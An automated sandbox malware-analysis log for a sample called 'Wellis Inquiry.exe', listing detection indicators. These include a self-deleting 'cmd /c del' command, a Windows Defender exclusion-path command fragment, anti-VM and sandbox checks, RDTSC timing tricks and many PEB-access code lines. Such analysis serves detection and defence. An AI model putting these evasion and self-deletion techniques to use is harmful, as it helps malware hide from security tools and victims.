Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_02D35EAC push FFFFFFABh; iretd
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_02D2EE6C push edx; ret
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_02D3B7D5 push eax; ret
Source: initial sample | Static PE information: section name: .text entropy: 7.93897204497

          Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete
Source: C:\Windows\SysWOW64\cmmon32.exe | Process created: /c del 'C:\Users\user\Desktop\Wellis Inquiry.exe'
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmmon32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match | File source: 0.2.Wellis Inquiry.exe.339002c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.670890366.0000000003341000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Wellis Inquiry.exe PID: 7036, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Wellis Inquiry.exe, 00000000.00000002.670890366.0000000003341000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
Source: Wellis Inquiry.exe, 00000000.00000002.670890366.0000000003341000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe | RDTSC instruction interceptor: First address: 0000000002D28604 second address: 0000000002D2860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe | RDTSC instruction interceptor: First address: 0000000002D2899E second address: 0000000002D289A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Wellis Inquiry.exe TID: 7040 | Thread sleep time: -40370s >= -30000s
Source: C:\Users\user\Desktop\Wellis Inquiry.exe TID: 7064 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 2848 | Thread sleep time: -35000s >= -30000s
Source: C:\Windows\SysWOW64\cmmon32.exe TID: 6880 | Thread sleep time: -36000s >= -30000s
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmmon32.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_004088D0 rdtsc
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Thread delayed: delay time: 40370
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Thread delayed: delay time: 922337203685477
Source: Wellis Inquiry.exe, 00000000.00000002.670890366.0000000003341000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: Wellis Inquiry.exe, 00000000.00000002.670890366.0000000003341000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000004.00000000.679441377.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Wellis Inquiry.exe, 00000000.00000002.670890366.0000000003341000.00000004.00000001.sdmp | Binary or memory string: vmware
Source: explorer.exe, 00000004.00000000.709634080.0000000006650000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.679441377.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.672692112.0000000004710000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000004.00000000.697371801.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000004.00000000.713207756.000000000A897000.00000004.00000001.sdmp | Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}i
Source: explorer.exe, 00000004.00000000.679809243.000000000A784000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: Wellis Inquiry.exe, 00000000.00000002.670890366.0000000003341000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_004088D0 rdtsc
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\cmmon32.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011B9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011E513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011D4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011D4120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011DB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011BB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011BC962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_012749A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_012369A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011E2990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011EA185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_012351BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011DC182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011E61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_012441E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011BB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011DA830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011E002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_01237016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011CB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_01284015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011D0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_01272073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_01281074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011B9080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011EF0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011EF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_01233884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F90AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011E20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_0124B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_0124B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011B58EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011B40E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_0127131B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011BF358 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011BDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01288B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011BDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01285BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011EB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0126D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0127138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_012353CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_012353CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011D3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011BAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011BAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0127AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0127AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0126B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0126B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01288A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0127EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01244257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011ED294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011ED294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011CAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011CAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011EFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0123A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01288D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0127E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011BAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011D7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01233540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01263D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_012805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_012805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011EFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011EFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0127FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0127FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0127FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0127FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01268DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01236DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01236DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01236DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01236DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01236DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01236DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011CD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011CD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01271C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0128740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0128740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0128740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01236C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01236C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01236C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01236C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011EBC2C mov eax, dword ptr fs:[00000030h]
